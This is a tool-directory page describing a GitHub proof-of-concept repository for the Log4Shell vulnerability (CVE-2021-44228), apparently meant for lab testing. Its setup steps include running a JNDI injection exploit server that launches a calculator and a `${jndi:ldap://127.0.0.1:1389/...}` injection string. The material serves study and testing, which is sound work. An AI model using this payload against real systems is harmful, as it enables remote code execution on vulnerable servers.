Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2021-44228_Log4Shell — Log4Shell A test for CVE-2021-44228 | Kitploit
Tools/GitHubGitHub/yanghaoi/cve-2021-44228_log4shell
Vulnerability AnalysisExploitationWeb Application ExploitationLearning & EducationLabs & Practice
GitHubyanghaoi/cve-2021-44228_log4shell

CVE-2021-44228_Log4Shell

Log4Shell A test for CVE-2021-44228

View Repository
4 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2021-44228_Log4Shell

Test source code for Log4Shell(CVE-2021-44228).

Step Information

  1. Install JDK8 (< 8u191) in virtual machine(Windows 10).

  2. Copy out\artifacts\POC_jar\POC.jar in Windows.

  3. Copy JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar in Windows, Get JNDI-Injection-Exploit

  4. Run java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "calc" -A "127.0.0.1"

  5. Run java -jar POC.jar ${jndi:ldap://127.0.0.1:1389/*****}

  

Download Tool